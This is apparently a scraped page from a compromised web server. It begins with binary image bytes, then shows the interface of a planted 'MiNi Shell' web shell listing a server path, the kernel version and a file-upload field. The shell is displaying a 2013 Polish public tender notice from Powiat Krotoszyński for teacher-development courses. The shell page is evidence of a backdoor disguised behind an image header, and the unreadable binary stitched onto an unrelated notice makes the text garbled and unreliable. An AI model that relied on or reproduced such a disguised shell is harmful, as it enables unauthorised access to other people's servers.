JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131204/261951-N-2013.html

<p class="kh_header"><b>Krotoszyn: Realizacja ofert doskonalenia dla nauczycieli biorących udział w projekcie Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim.</b><br>
<b>Numer ogłoszenia: 261951 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja ofert doskonalenia dla nauczycieli biorących udział w projekcie Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Jak i po co prowadzić ewaluację wewnętrzną Odbiorcy- nauczyciele Przedszkola Parkowe Skrzaty w Koźminie Wlkp. Liczba nauczycieli: 20 Terminy realizacji wykładów i warsztatów: 29, 30.01.2013 r. (I tura) 25, 26.02.2014 r. (II tura)SORE: Alina Jańczak Wykłady: 6 godz. Nabycie i zweryfikowanie wiedzy na temat ewaluacji, form w jakich realizowana jest w edukacji - ewaluacja wewnętrzna i zewnętrzna oraz jej funkcji w procesie rozwoju placówki.  Cele i istota ewaluacji - po co jest? Założenia ewaluacji wewnętrznej i zewnętrznej. Analiza 	wymagań stawianych placówce. Obszary ewaluacji. Co oznaczają przyznawane placówce 	oceny? (3h)Procedura prowadzenia ewaluacji - opis kolejnych działań, planowanie działań ewaluacyjnych.Poznanie przez nauczycieli metod, narzędzi i procedur przydatnych w przeprowadzeniu ewaluacji wewnętrznej. (3h)Warsztaty: 15 godz.Warunki udanej ewaluacji. Ćwiczenie umiejętności przeprowadzania ewaluacji. Jak przygotować się do ewaluacji zewnętrznej? Przełożenie wyników i wniosków z ewaluacji wewnętrznej na zadania. (5h)Opracowanie i wdrożenie działań służących rozwojowi i doskonaleniu jakości pracy przedszkola - innowacyjne metody pracy. Współpraca ze środowiskiem lokalnym. Współpraca z rodzicami(komunikacja, formy). Oferta przedszkola. Kształcenie kompetencji w zakresie form pracy zespołowej. (10h)Konsultacje grupowe: 6 godz. Terminy: marzec/kwiecień 2014 r. Zadanie 2Ocenianie kształtujące Odbiorcy - nauczyciele Niepublicznego Gimnazjum w Krotoszynie Liczba nauczycieli: 14 Terminy realizacji wykładów i warsztatów: 23, 27.01.2014 r. (I tura)18, 27.02.2014 r. (II tura)SORE: Agnieszka Gierłowska Wykłady: 6 godz.Ocenianie kształtujące SUS-  czym jest, na czym polega?Przygotowanie szkoły do wprowadzenia elementów ok.Warsztaty: 15 godz.Wprowadzenie do szkoły jednolitego systemu oceniania zawierającego elementy ok - opracowanie i wdrożenie jednolitego  modelu pozwalającego na trwałe stosowanie metod ok. na wszystkich przedmiotach i zajęciach oraz jako ocenę zachowania. Motywowanie uczniów, również uczniów ze specjalnymi potrzebami edukacyjnymi do nauki poprzez  wprowadzanie skutecznych metod uczenia się i ich stosowanie.Poszerzenie kompetencji nauczycieli w obszarze stosowania informacji zwrotnej w ocenianiu oraz komunikacji z rodzicami uczniów. Zaznajomienie n-la ze sposobami formułowania IZ adresowanej do ucznia w taki sposób, by motywowała ona ucznia do pracy i przyniosła obustronne korzyści. Prowokowanie ucznia do samooceny i autorefleksji jako sposobu na zwiększenie świadomości dot. własnych osiągnięć edukacyjnych.
Konsultacje: 6 godz. terminy: marzeckwiecień 2014 r. Zadanie  3 Budowa koncepcji pracy przedszkola.Odbiorcy - nauczyciele Przedszkola nr 5 w Krotoszynie Liczba nauczycieli: 10 Terminy realizacji wykładów i warsztatów: 29, 30.01.2014 r. (I tura)
17, 18.02.2014 r. (II tura)SORE: Irena Grobelna Wykłady: 6 godz. Metody i formy pracy z dziećmi w wieku przedszkolnym.zaprezentowanie nowości (3h)Jak efektywnie rozwijać współpracę z rodzicami i środowiskiem lokalnym (położenie nacisku na środowisko) (3h)Warsztaty: 15 godz.Metody i formy pracy w edukacji umysłowej 
logiczne myślenie,rozwijanie mowy,praca metodą projektu (5h)Wzorcowe ułożenie koncepcji pracy przedszkola (5h)Model absolwenta - jak osiągnąć założony, wzorcowy rezultat (5h)Konsultacje grupowe: 6 godz. Terminy: marzec kwiecień 2014 r. Zadanie 4 Oferta edukacyjna drogą do właściwej realizacji podstawy programowej
Odbiorcy nauczyciele Przedszkola nr 6 z Oddziałami Integracyjnymi w Krotoszynie 
Liczba nauczycieli: 13 Terminy realizacji wykładów i warsztatów: 09, 10.01.2014 r. (I tura) 20, 21.02.2014 r. (II tura)SORE; Joanna Rogowska-Sroka Wykłady: 6 godz. Innowacje pedagogiczne jako ciekawy sposób na realizację podstawy programowej.Aspekty prawne tworzenia innowacji pedagogicznych zgodnych z podstawą programową i procedura uzyskania wpisu do rejestru i akceptacji KO (2h)Umiejętność poprawnego tworzenia innowacji pedagogicznych zgodnych z podstawą programową - jej części składowe, pułapki i najczęstsze błędy (2h Etapy, procedury wdrażania innowacji pedagogicznych w przedszkolu z oddziałami integracyjnymi (2h)Warsztaty: 15 godz. Jak wybrać obszar do wprowadzenia innowacji pedagogicznej zgodnej z podstawą programową? - metody i narzędzia do diagnozy (2h)Przegląd przykładowych innowacji pedagogicznych realizowanych w przedszkolach, w tym również w przedszkolach z oddziałami integracyjnymi (1h)Tworzenie własnej innowacji pedagogicznej zgodnej z podstawą programową i zdiagnozowanymi potrzebami przedszkola z oddziałami integracyjnymi. (10h)Jak poprawnie przeprowadzić ewaluację opracowanej innowacji pedagogicznej w przedszkolu z oddziałami integracyjnymi? (2h)Konsultacje grupowe: 6 godz. 
Terminy: marzec kwiecień 2014 r. Zadanie 5 Szkoła promuje wartość edukacji
Odbiorcy - nauczyciele I Liceum Ogólnokształcącego im. Powstańców Wlkp. w Koźminie Wlkp. Liczba nauczycieli: 16 Terminy realizacji wykładów i warsztatów: 30, 31.01.2014 r. (I tura)20, 21.02.2014 r. (II tura) SORE: Sylwia Minta 
Wykłady: 6 godz. budowanie pozytywnego wizerunku i tożsamości szkoły (logo, strona internetowa, media relations),promowanie wartości edukacji i potrzeby uczenia się w środowisku własnym i lokalnym,pozyskiwanie sponsorów na realizację działań promocyjnych,działania informacyjne i public relations w praktyce szkoły (6h)
Warsztaty: 15 godz. analiza form promowania szkoły i ich skuteczność, metody zainteresowania szkołą i jej ofertą edukacyjną uczniów i rodziców, efektywna prezentacja szkoły na targach edukacyjnych, jak radzić sobie z negatywnymi opiniami na temat szkoły, jak zmienić stereotypy i opinie na temat szkoły (5h)kampania wizerunkowo-medialna szkoły - planowanie, wdrażanie, monitoring i ewaluacja kolejnych etapów (5h)strategie i formy współpracy z rodzicami i środowiskiem lokalnym oraz instytucjami w celu propagowania edukacji oraz promocji szkoły (5h)Konsultacje grupowe: 6 godz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż   w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał-przeprowadził (a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych) minimum 50 godzin (łącznie) doskonalenia czynnych zawodowo nauczycieli polegających na przeprowadzeniu szkoleń lub warsztatów,  których wartość razem wyniosła min 3.000,00 zł brutto.  Wykaz  winien zawierać tematykę przeprowadzonych szkoleń lub warsztatów, ilość godzin przeprowadzonego doskonalenia, wartości zrealizowanych szkoleń lub warsztatów, dat wykonania i podmiotów  na rzecz których usługi zostały wykonane wraz z załączeniem dowodów czy usługi zostały wykonane  lub są wykonywane należycie.
Dowodami, o których mowa powyżej są poświadczenia, a w przypadku usług  okresowych lub ciągłych  poświadczenie winno być wydane  nie wcześniej niż  na 3 miesiące przed upływem terminu składania ofert.
Wykonawca  w miejsce poświadczeń może przedłożyć dokumenty  potwierdzające należyte wykonanie usług np. referencje (na podstawie § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów  w sprawie rodzajów dokumentów, jakich zamawiający może żądać od wykonawcy oraz form w jakich mogą być składane -Dz.U. z 2013 poz. 231) 

Ocena spełniania warunku odbędzie się na podstawie złożonego wykazu usług oraz dowodów  poświadczających  należyte wykonanie bądź wykonywanie usług,  na zasadzie  spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż  dysponuje co najmniej 1 ekspertem - zdolnym do wykonania zamówienia, który posiada wykształcenie magisterskie II stopnia z zakresu nauk pedagogicznych lub społecznych lub psychologicznych lub technicznych, posiada formalne przygotowanie do pracy trenera (posiada dokumenty potwierdzające umiejętności trenerskie np. certyfikat trenera lub zaświadczenie o ukończeniu szkoły/studiów podyplomowych z zakresu umiejętności trenerskich) -przeprowadził  co najmniej 5 szkoleń lub warsztatów dla czynnych zawodowo nauczycieli, rad pedagogicznych. Ponadto Wykonawca  złoży informację o podstawie do dysponowania tymi osobami. 

W przypadku składania oferty na kilka zadań, Wykonawca może powołać się na tę samą osobę przeznaczoną do wykonania poszczególnych zadań, pod warunkiem, że terminy ich realizacji, podane w harmonogramie nie kolidują ze sobą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony formularz ofertowy
b) W przypadku osób fizycznych nie prowadzących działalności gospodarczej, zamiast dokumentów - aktualnego odpisu z właściwego rejestru lub centralnej ewidencji i informacji  o działalności gospodarczej (o których mowa powyżej) - Wykonawca  winien złożyć oświadczenie  o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	Zamawiający przewiduje możliwość zmiany sposobu spełnienia świadczenia w następujący sposób:    Dopuszcza się zmianę osoby,  dodanie kolejnych osób do realizacji zamówienia  przez Wykonawcę. W takim przypadku, Wykonawca do realizacji przedmiotu zamówienia zapewnia  osoby posiadające    kwalifikacje i doświadczenie nie mniejsze niż określone w warunkach udziału   w postępowaniu,
b)	Zmiana miejsca świadczenia usługi w przypadku, gdy Zamawiający nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość 
3.	Umowa może ulec zmianie również w przypadku  zmiany terminu realizacji umowy  z uwagi na działanie siły wyższej. 
4.	Dla potrzeb Umowy siła wyższa oznacza zdarzenie pozostające poza kontrolą Wykonawcy, występujące po podpisaniu Umowy przez obie Strony, przeszkadzające racjonalnemu wykonaniu przez Wykonawcę obowiązków, nie obejmujące winy własnej lub nienależytej staranności Wykonawcy lub osób, którymi się posłużył przy wykonywaniu umowy i nieprzewidywalne w dacie zawarcia niniejszej Umowy ani też niemożliwe do zapobieżenia. 
5.	Jeżeli siła wyższa spowoduje niewykonanie lub nienależyte wykonanie zobowiązań wynikających z Umowy: 
a)	Wykonawca , który nie wykonał lub nienależycie wykonał swoje zobowiązania ze względu na działanie siły wyższej, zawiadomi w terminie 2 dni, na piśmie Zamawiającego o powstaniu i przewidywanym zakończeniu tego zdarzenia, przedstawiając stosowną dokumentację uzasadniającą w tym zakresie; 
b)	Jeżeli Zamawiający  uzna argumentację  Wykonawcy, o której mowa w ust. 3 a,  za uzasadnioną sporządzi stosowny aneks do umowy.
9.	Strona przystąpi do dalszego wykonywania Umowy niezwłocznie po zakończeniu działania siły wyższej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat-krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat-krotoszyn.bip.net.pl
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie realizowane jest w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim   (nr WND POKL.03.05.00-00-157/12) realizowany w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet: III. Wysoka jakość systemu oświaty, Działanie: 3.5. Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1

 Jak i po co prowadzić ewaluację wewnętrzną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1

 Jak i po co prowadzić ewaluację wewnętrzną
 Odbiorcy- nauczyciele Przedszkola Parkowe Skrzaty w Koźminie Wlkp. 
Liczba nauczycieli: 20 
Terminy realizacji wykładów i warsztatów: 
29, 30.01.2013 r. (I tura) 
25, 26.02.2014 r. (II tura)
SORE: Alina Jańczak 

Wykłady: 6 godz. 
1)	Nabycie i zweryfikowanie wiedzy na temat ewaluacji, form w jakich realizowana jest 
w edukacji - ewaluacja wewnętrzna i zewnętrzna oraz jej funkcji w procesie rozwoju placówki.  
	Cele i istota ewaluacji - po co jest? Założenia ewaluacji wewnętrznej i zewnętrznej. Analiza 	wymagań stawianych placówce. Obszary ewaluacji. Co oznaczają przyznawane placówce 	oceny? (3h)
2)	Procedura prowadzenia ewaluacji - opis kolejnych działań, planowanie działań ewaluacyjnych.
	Poznanie przez nauczycieli metod, narzędzi i procedur przydatnych w przeprowadzeniu 	ewaluacji wewnętrznej. (3h)

Warsztaty: 15 godz.
1)	Warunki udanej ewaluacji. Ćwiczenie umiejętności przeprowadzania ewaluacji. Jak przygotować się do ewaluacji zewnętrznej? Przełożenie wyników i wniosków z ewaluacji wewnętrznej na zadania. (5h)
2)	Opracowanie i wdrożenie działań służących rozwojowi i doskonaleniu jakości pracy przedszkola - innowacyjne metody pracy. Współpraca ze środowiskiem lokalnym. Współpraca z rodzicami(komunikacja, formy). Oferta przedszkola. Kształcenie kompetencji w zakresie form pracy zespołowej. (10h)

Konsultacje grupowe: 6 godz. 
Terminy: marzec kwiecień 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 84.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2

Ocenianie kształtujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2

Ocenianie kształtujące 
Odbiorcy - nauczyciele Niepublicznego Gimnazjum w Krotoszynie 
Liczba nauczycieli: 14 
Terminy realizacji wykładów i warsztatów: 
23, 27.01.2014 r. (I tura)
18, 27.02.2014 r. (II tura)
SORE: Agnieszka Gierłowska 

Wykłady: 6 godz. 
1)	Ocenianie kształtujące SUS-  czym jest, na czym polega?
2)	Przygotowanie szkoły do wprowadzenia elementów ok.

Warsztaty: 15 godz.
1)	Wprowadzenie do szkoły jednolitego systemu oceniania zawierającego elementy ok - opracowanie i wdrożenie jednolitego  modelu pozwalającego na trwałe stosowanie metod ok. na wszystkich przedmiotach i zajęciach oraz jako ocenę zachowania. 
2)	Motywowanie uczniów, również uczniów ze specjalnymi potrzebami edukacyjnymi do nauki poprzez  wprowadzanie skutecznych metod uczenia się i ich stosowanie.
